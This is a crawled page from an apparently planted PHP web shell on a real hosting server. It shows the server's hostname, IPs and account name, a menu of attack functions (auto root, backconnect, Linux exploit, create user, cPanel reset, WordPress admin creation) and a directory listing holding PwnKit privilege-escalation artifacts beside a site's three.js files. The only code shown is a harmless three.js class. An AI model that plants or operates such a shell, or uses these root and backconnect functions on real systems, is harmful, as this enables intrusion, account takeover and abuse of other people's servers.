Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.133.114.90
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
HRD-Test /
src /
materials /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LineBasicMaterial.js
727
B
-rw-r--r--
LineDashedMaterial.js
524
B
-rw-r--r--
Material.js
14.4
KB
-rw-r--r--
Materials.js
1.39
KB
-rw-r--r--
MeshBasicMaterial.js
1.57
KB
-rw-r--r--
MeshDepthMaterial.js
977
B
-rw-r--r--
MeshDistanceMaterial.js
699
B
-rw-r--r--
MeshLambertMaterial.js
2.54
KB
-rw-r--r--
MeshMatcapMaterial.js
1.49
KB
-rw-r--r--
MeshNormalMaterial.js
1.24
KB
-rw-r--r--
MeshPhongMaterial.js
2.67
KB
-rw-r--r--
MeshPhysicalMaterial.js
4.22
KB
-rw-r--r--
MeshStandardMaterial.js
2.66
KB
-rw-r--r--
MeshToonMaterial.js
2.2
KB
-rw-r--r--
PointsMaterial.js
719
B
-rw-r--r--
RawShaderMaterial.js
268
B
-rw-r--r--
ShaderMaterial.js
3.91
KB
-rw-r--r--
ShadowMaterial.js
513
B
-rw-r--r--
SpriteMaterial.js
761
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PointsMaterial.js
import { Material } from './Material.js'; import { Color } from '../math/Color.js'; class PointsMaterial extends Material { constructor( parameters ) { super(); this.isPointsMaterial = true; this.type = 'PointsMaterial'; this.color = new Color( 0xffffff ); this.map = null; this.alphaMap = null; this.size = 1; this.sizeAttenuation = true; this.fog = true; this.setValues( parameters ); } copy( source ) { super.copy( source ); this.color.copy( source.color ); this.map = source.map; this.alphaMap = source.alphaMap; this.size = source.size; this.sizeAttenuation = source.sizeAttenuation; this.fog = source.fog; return this; } } export { PointsMaterial };
Close